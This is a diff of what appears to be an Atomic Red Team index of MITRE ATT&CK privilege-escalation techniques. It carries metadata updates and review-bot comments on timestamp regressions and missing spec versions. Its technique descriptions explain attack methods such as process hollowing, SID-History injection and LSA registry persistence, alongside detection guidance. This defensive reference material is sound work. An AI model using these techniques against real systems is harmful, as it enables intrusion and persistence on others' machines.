Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -25522,7 +25831,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -25532,7 +25840,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -25541,19 +25849,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
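Review bot: replacing the platforms 'Azure AD', 'Office 365' and 'Google Workspace' with 'Office Suite' and 'Identity Provider' changes the strings that any per-platform filtering of this index is keyed on; unless the generator maps the new names onto the existing platform-specific outputs, T1078 silently drops out of them. Please confirm that mapping is in place before merging. The `x_mitre_version: '2.6'` to `'2.7'` bump is right to keep, since this is a content change to the technique object, as is moving `x_mitre_modified_by_ref` to the end of the object as long as it is re-added there.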
@@ -25601,11 +25907,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -25673,23 +25980,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
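Review bot: the 'Leitch Hollowing' reference now points at a third-party mirror (new.dc414.org) instead of an archive snapshot, so it is one host outage away from going stale again; the 'bencane blog bashrc' reference elsewhere in this diff uses a web.archive.org URL, which is the more durable pattern and would be worth applying here too. In the same hunk `modified` for T1068 regresses from '2023-10-31T14:00:00.188Z' to '2023-04-07T17:13:54.168Z', the same backwards-timestamp pattern seen on other objects in this diff.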
@@ -25752,11 +26058,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -25809,8 +26114,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -25858,78 +26163,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
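Review bot: this hunk deletes the whole of T1546.004's `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and thirteen `external_references` entries only because the generator now emits keys in a different order; the same content is re-added lower in the object, and the only real change is the 'bencane blog bashrc' URL moving to a web.archive.org snapshot. A deletion of this size for a reorder hides that one change. Consider pinning the key order in the generator, or at least stating in the commit message that this block is a move, not a removal.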
@@ -25977,6 +26215,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -25987,9 +26229,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -25998,8 +26244,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
@@ -26194,7 +26499,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -26219,13 +26524,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
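Review bot: T1134.005 ends up with no ATT&CK spec version at all: `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` are both deleted and nothing replaces them, whereas most techniques in this diff are carried to `x_mitre_attack_spec_version: 3.2.0`. In the same hunk `modified` for T1548.004 also steps backwards, from 2022-11-08 to 2022-10-19. Please either regenerate this object so it carries the 3.2.0 marker as well, or explain the inconsistency in the commit message.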
@@ -26305,7 +26608,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -26341,7 +26643,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -26364,12 +26666,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -26447,12 +26748,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -26513,7 +26813,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -26557,7 +26856,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -26579,7 +26878,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -26660,7 +26958,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -26683,7 +26980,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
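Review bot: `modified` for T1037.003 regresses by more than a year, from '2021-04-29T14:49:39.188Z' to '2020-03-24T23:45:25.625Z'. This is the largest backwards step in the file and deserves a sentence in the commit message explaining which source bundle produced it; a consumer diffing two versions of this index by `modified` would read this as the technique having been rolled back.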
@@ -26713,12 +27010,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
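Review bot: T1037.003 is left without `x_mitre_attack_spec_version` here (both the `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` lines go and nothing comes in), unlike the objects bumped to 3.2.0 elsewhere in this diff, and T1546.010's `modified` steps back from 2023-05-09 to 2023-04-21. Same two concerns as for T1134.005: re-add the spec marker or document the exception, and confirm the source bundle for the timestamps.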
@@ -26803,7 +27098,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -26868,7 +27162,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -26943,7 +27236,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -26971,7 +27264,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -27002,7 +27294,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -27045,12 +27337,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
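Review bot: T1055.009 (Proc Memory) drops `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` and gets no replacement, so after this change some process-injection sub-techniques carry a 3.2.0 marker and others carry none; anything that reads the spec version to decide how to parse an object will need to tolerate the missing key. The `modified` change for T1546.016 in the same hunk (2024-04-12 to 2024-04-28) is a forward move and looks correct.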
@@ -27067,7 +27357,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
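Review bot: the contributor rename flips 'Alexander Rodchenko' to surname-first 'Rodchenko Aleksandr', while the other contributor fix in this diff ('Goldstein Menachem' to 'Menachem Goldstein') normalises to given-name-first. If both strings are copied verbatim from the upstream bundle, say so in the commit message; otherwise pick one ordering for contributor names and apply it consistently.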
@@ -27126,7 +27416,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -27208,7 +27497,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -27255,7 +27543,7 @@ privilege-escalation:
'
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -27352,7 +27640,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -27466,7 +27753,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests:
- name: Create Systemd Service
@@ -27690,7 +27976,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -27718,7 +28003,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -27762,8 +28047,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
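Review bot: this object loses `x_mitre_attack_spec_version: 2.1.0` as well as `spec_version`, leaving it with no spec-version field at all, whereas T1543.002 just above keeps `x_mitre_attack_spec_version: 3.2.0` as unchanged context; the same double removal appears later for T1055.008 and T1037.001. Check whether the generator intentionally drops the key for objects still on spec 2.1.0 or whether these objects were simply not updated upstream, and make the handling uniform either way.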
@@ -27799,7 +28082,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -27818,12 +28101,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -27873,12 +28155,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
